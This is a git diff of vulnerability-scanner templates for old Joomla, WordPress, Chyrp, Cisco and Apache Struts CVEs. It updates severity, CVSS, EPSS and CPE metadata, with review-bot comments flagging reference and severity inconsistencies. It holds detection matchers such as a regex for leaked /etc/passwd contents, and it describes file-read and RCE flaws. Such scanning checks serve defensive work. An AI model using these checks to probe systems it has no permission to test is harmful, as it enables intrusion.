+ part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 1f730f8070..d1f6dac332 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml 
@@ -3,22 +3,25 @@ id: CVE-2010-5286 info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34837 - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt remediation: Upgrade to a supported version. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 cve-id: CVE-2010-5286 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + cwe-id: CWE-22 + epss-score: 0.04708 + cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joobi + product: com_jstore + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 48844d6d78..3a1121c10d 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml 
@@ -3,22 +3,27 @@ id: CVE-2011-0049 info: name: Majordomo2 - SMTP/HTTP Directory Traversal author: pikpikcu - severity: high + severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 + - http://securityreason.com/securityalert/8061 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - tags: cve,cve2011,majordomo2,lfi,edb + epss-score: 0.96615 + cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mj2 + product: majordomo_2 + tags: cve,cve2011,majordomo2,lfi,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index d632708f3b..14b2c92930 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml 
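Review bot: The reference `- https://nvd.nist.gov/vuln/detail/CVE-2011-0063` points at a different CVE than this template's `cve-id: CVE-2011-0049`, and the commit leaves it in place while adding the securityreason link beneath it. Unless CVE-2011-0063 is a deliberate cross-reference, it should read `- https://nvd.nist.gov/vuln/detail/CVE-2011-0049`; the Bugzilla attachment URL on the following line looks equally unrelated to Majordomo and is worth checking at the same time. This is a context line, but it is the only NVD link the template carries.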
@@ -3,22 +3,26 @@ id: CVE-2011-1669 info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 - - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/ - http://www.exploit-db.com/exploits/17119 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-1669 cwe-id: CWE-22 + epss-score: 0.02966 + cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-custom-pages/" + vendor: mikoviny + product: wp_custom_pages tags: edb,cve,cve2011,wordpress,wp-plugin,lfi http: @@ -28,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 5264b1a9a7..1166adb100 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml 
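Review bot: The reference list of CVE-2011-1669 carries the same Exploit-DB entry twice, `https://www.exploit-db.com/exploits/17119` and `http://www.exploit-db.com/exploits/17119`; the commit removes the archived SecurityFocus link between them but not the duplicate. Keep the https form and drop the http one.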
@@ -3,21 +3,26 @@ id: CVE-2011-2744 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. reference: - https://www.exploit-db.com/exploits/35945 - http://www.openwall.com/lists/oss-security/2011/07/13/6 - https://nvd.nist.gov/vuln/detail/CVE-2011-2744 - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ + - http://securityreason.com/securityalert/8312 + - http://www.ocert.org/advisories/ocert-2011-001.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2011-2744 cwe-id: CWE-22 - tags: cve,cve2011,lfi,chyrp,edb + epss-score: 0.01913 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 9f081fbff5..277d5450e7 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml 
@@ -3,27 +3,28 @@ id: CVE-2011-2780 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 - http://www.ocert.org/advisories/ocert-2011-001.html - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/ - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - - http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2011-2780 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2011,lfi,chyrp + epss-score: 0.04076 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp http: - method: GET @@ -32,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 3e42638914..8bbde93741 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml 
@@ -12,12 +12,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2011,lfi,cisco,edb + epss-score: 0.92426 + cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_interactive_voice_response + tags: cve,cve2011,lfi,cisco,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index dfab657b6f..d2ebe41abd 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -7,7 +7,6 @@ info: description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 remediation: Upgrade to a supported version. classification: @@ -15,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* epss-score: 0.00182 - tags: seclists,cve,cve2011,xss,tikiwiki + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: seclists,cve,cve2011,xss,tikiwiki http: - method: GET @@ -29,15 +30,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index bd223433f3..b6604a3e55 100644 --- a/http/cves/2011/CVE-2011-4618.yaml 
+++ b/http/cves/2011/CVE-2011-4618.yaml @@ -7,17 +7,23 @@ info: description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 - - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589 - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities + - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/ + - http://www.openwall.com/lists/oss-security/2011/12/19/6 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 + epss-score: 0.00746 + cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/advanced-text-widget" + vendor: simplerealtytheme + product: advanced_text_widget_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 58a25b3bcc..471638e581 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml 
@@ -9,15 +9,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 - http://www.openwall.com/lists/oss-security/2011/12/23/2 - http://plugins.trac.wordpress.org/changeset/469785 + - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 + epss-score: 0.00427 + cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flash-album-gallery" + framework: wordpress + vendor: codeasily + product: grand_flagallery tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index f6f1ff279d..80ffd86ac8 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml 
@@ -3,22 +3,25 @@ id: CVE-2011-4804 info: name: Joomla! Component com_kp - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/36598 - - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/ - - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/ - https://nvd.nist.gov/vuln/detail/CVE-2011-4804 + - http://foobla.com/news/latest/obsuggest-1.8-security-release.html remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2011,joomla + epss-score: 0.06953 + cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_obsuggest + tags: lfi,edb,cve,cve2011,joomla http: - method: GET @@ -27,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index f9f43503e9..7d3019d37b 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml 
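Review bot: The template name `Joomla! Component com_kp - 'Controller' Local File Inclusion` does not match the component named everywhere else in the hunk: the description says obSuggest (`com_obsuggest`), the added CPE is `foobla:com_obsuggest`, and the new metadata is `product: com_obsuggest`. Since the commit is populating vendor/product from the CPE, the name line should be corrected at the same time, e.g. `name: Joomla! Component obSuggest <1.8 - 'Controller' Local File Inclusion`. As it stands, a report would name a component that the check does not exercise.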
@@ -10,14 +10,19 @@ info: - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 - http://www.openwall.com/lists/oss-security/2012/01/10/9 + - http://wordpress.org/extend/plugins/adminimize/changelog/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4926 cwe-id: CWE-79 + epss-score: 0.0083 + cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/adminimize/" + vendor: bueltge + product: adminimize tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 8e7caf2509..c4bfe1ccc2 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -10,14 +10,19 @@ info: - https://wordpress.org/plugins/flexible-custom-post-type/#developers - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5106 cwe-id: CWE-79 + epss-score: 0.00541 + cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" + vendor: fractalia + product: flexible_custom_post_type tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 5ffe67d47c..f3cc844eb4 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml 
@@ -7,17 +7,19 @@ info: description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ - - http://web.archive.org/web/20210121220155/https://www.securityfocus.com/bid/50743/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 - - http://web.archive.org/web/20201208110708/https://www.securityfocus.com/archive/1/520590/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5107 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.0022 + cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/alert-before-your-post" + vendor: wordpress + product: alert_before_you_post tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index c7112352b5..b05e7b900c 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml 
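Review bot: The first reference entry of CVE-2011-5107 holds two URLs in one scalar, `- https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/...`, at least as rendered here, so the Acunetix link is not a separate list item and will not be treated as a URL by anything that reads `reference`. CVE-2012-0392 further down has the same problem with its cwiki.apache.org and blog.csdn.net references. Split each into two `- ` items; the commit already edits the surrounding reference list in both files.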
@@ -7,17 +7,19 @@ info: description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - - http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 - - http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5179 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.0022 + cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/skysa-official/" + vendor: skysa + product: skysa_app_bar_integration_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -28,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index d3b5022ce3..9d425d5705 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml 
@@ -7,16 +7,20 @@ info: description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - - http://web.archive.org/web/20210123155244/https://www.securityfocus.com/bid/50778/ - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 + epss-score: 0.00326 + cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" + vendor: clickdesk + product: clickdesk_live_support-live_chat_plugin tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index e6242ec0da..52d3dd4fa4 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -11,14 +11,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + - http://orchard.codeplex.com/discussions/283667 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 + epss-score: 0.0304 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: orchardproject + product: orchard tags: cve,cve2011,redirect,orchard http: 
diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index f7d234f7bf..1d9c89e55e 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -7,16 +7,19 @@ info: description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 - - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5265 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00432 + cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" + vendor: featurific_for_wordpress_project + product: featurific-for-wordpress tags: cve,cve2011,wordpress,xss,wp-plugin http: @@ -27,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index afb5f2abae..65aade183b 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml 
@@ -3,22 +3,27 @@ id: CVE-2012-0392 info: name: Apache Struts2 S2-008 RCE author: pikpikcu - severity: critical + severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - http://www.exploit-db.com/exploits/18329 - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 + - http://struts.apache.org/2.x/docs/s2-008.html remediation: Developers should immediately upgrade to at least Struts 2.3.18. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - tags: cve2012,apache,rce,struts,java,edb,cve + epss-score: 0.97059 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve2012,apache,rce,struts,java,edb,cve http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 28f3404635..a6f87cd4be 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml 
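Review bot: The `severity: critical` → `severity: medium` change in the CVE-2012-0392 info block downgrades an unauthenticated Struts RCE (S2-008, `epss-score: 0.97059`) to a level that users running with `-severity critical,high` exclude, so the template silently drops out of default triage even though its exploitability data points the other way. The same downgrade appears in CVE-2012-0394 (`critical` → `medium`), CVE-2012-3153 (`critical` → `medium`) and CVE-2012-1823 (`critical` → `high`, a `kev`-tagged PHP-CGI RCE); if the intent is to mirror the NVD CVSS v2 base score, the commit description should say so, otherwise keep the impact-based severity and let `cvss-score` carry the numeric rating. The context line `remediation: Developers should immediately upgrade to at least Struts 2.3.18.` also sits next to a description that scopes the issue to versions before 2.3.1.1; the two look inconsistent and are worth reconciling while this block is being edited.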
@@ -3,7 +3,7 @@ id: CVE-2012-0394 info: name: Apache Struts <2.3.1.1 - Remote Code Execution author: tess - severity: critical + severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." reference: @@ -13,16 +13,19 @@ info: - http://www.exploit-db.com/exploits/18329 - https://nvd.nist.gov/vuln/detail/CVE-2012-0394 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2012-0394 - cwe-id: CWE-77 + cwe-id: CWE-94 + epss-score: 0.953 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"Struts Problem Report" verified: true + vendor: apache + product: struts tags: ognl,injection,edb,cve,cve2012,apache,struts - variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 44e466cf92..74aeddee10 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml 
@@ -3,21 +3,26 @@ id: CVE-2012-0896 info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo - severity: high + severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896 + - http://wordpress.org/extend/plugins/count-per-day/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 + epss-score: 0.02262 + cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/count-per-day" + vendor: count_per_day_project + product: count_per_day tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal http: @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index cd65bdcf20..9747022681 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -11,12 +11,16 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00216 + cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" + vendor: attenzione + product: yousaytoo tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss http: 
